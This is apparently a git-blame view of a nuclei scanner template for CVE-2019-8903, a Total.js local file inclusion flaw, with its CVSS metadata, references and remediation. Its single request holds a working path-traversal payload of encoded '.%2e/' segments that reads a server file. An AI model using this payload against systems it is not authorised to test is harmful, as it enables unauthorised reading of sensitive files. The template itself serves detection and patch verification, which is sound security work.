2021-01-02 04:59:06 +00:00
|
|
|
id: CVE-2019-8903
|
2020-04-08 07:36:36 +00:00
|
|
|
|
|
|
|
info:
|
2022-07-26 13:45:11 +00:00
|
|
|
name: Totaljs <3.2.3 - Local File Inclusion
|
2020-04-08 07:36:36 +00:00
|
|
|
author: madrobot
|
|
|
|
severity: high
|
2022-07-26 13:45:11 +00:00
|
|
|
description: Total.js Platform before 3.2.3 is vulnerable to local file inclusion.
|
2023-09-27 15:51:13 +00:00
|
|
|
impact: |
|
|
|
|
An attacker can exploit this vulnerability to read sensitive files, execute arbitrary code, or launch further attacks.
|
2023-09-06 12:53:28 +00:00
|
|
|
remediation: |
|
|
|
|
Upgrade Totaljs to version 3.2.3 or later to fix the LFI vulnerability.
|
2021-08-18 11:37:49 +00:00
|
|
|
reference:
|
2021-03-30 12:10:17 +00:00
|
|
|
- https://blog.certimetergroup.com/it/articolo/security/total.js-directory-traversal-cve-2019-8903
|
|
|
|
- https://github.com/totaljs/framework/commit/c37cafbf3e379a98db71c1125533d1e8d5b5aef7
|
|
|
|
- https://github.com/totaljs/framework/commit/de16238d13848149f5d1dae51f54e397a525932b
|
2022-07-26 13:45:11 +00:00
|
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2019-8903
|
2024-01-29 17:11:14 +00:00
|
|
|
- https://github.com/ARPSyndicate/kenzer-templates
|
2021-09-10 11:26:40 +00:00
|
|
|
classification:
|
|
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
2022-04-22 10:38:41 +00:00
|
|
|
cvss-score: 7.5
|
2021-09-10 11:26:40 +00:00
|
|
|
cve-id: CVE-2019-8903
|
|
|
|
cwe-id: CWE-22
|
2023-10-16 10:55:14 +00:00
|
|
|
epss-score: 0.01071
|
2024-01-29 17:11:14 +00:00
|
|
|
epss-percentile: 0.82663
|
2023-09-06 12:53:28 +00:00
|
|
|
cpe: cpe:2.3:a:totaljs:total.js:*:*:*:*:*:node.js:*:*
|
2023-04-28 08:11:21 +00:00
|
|
|
metadata:
|
|
|
|
max-request: 1
|
2023-07-11 19:49:27 +00:00
|
|
|
vendor: totaljs
|
|
|
|
product: total.js
|
2023-09-06 12:53:28 +00:00
|
|
|
framework: node.js
|
2024-01-14 09:21:50 +00:00
|
|
|
tags: cve2019,cve,totaljs,lfi,node.js
|
2020-04-08 07:36:36 +00:00
|
|
|
|
2023-04-27 04:28:59 +00:00
|
|
|
http:
|
2020-04-08 07:36:36 +00:00
|
|
|
- method: GET
|
|
|
|
path:
|
2020-04-08 08:45:44 +00:00
|
|
|
- "{{BaseURL}}/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/var/www/html/index.html"
|
2023-07-11 19:49:27 +00:00
|
|
|
|
2020-07-08 11:38:57 +00:00
|
|
|
matchers-condition: and
|
2020-04-08 07:36:36 +00:00
|
|
|
matchers:
|
2020-04-08 11:17:49 +00:00
|
|
|
- type: word
|
2023-07-11 19:49:27 +00:00
|
|
|
part: body
|
2020-04-08 11:17:49 +00:00
|
|
|
words:
|
|
|
|
- "apache2.conf"
|
2023-07-11 19:49:27 +00:00
|
|
|
|
|
|
|
- type: status
|
|
|
|
status:
|
|
|
|
- 200
|
2024-01-30 06:46:18 +00:00
|
|
|
# digest: 4b0a00483046022100ef018da3f2c771700041b2cf2bccfd4ed4b27fb1de21aafff551f5d677ac2d96022100e530fc937b9d2e5b939cacee9dc19413956ce91c625046f41c347f7dff85d0af:922c64590222798bb761d5b6d8e72950
|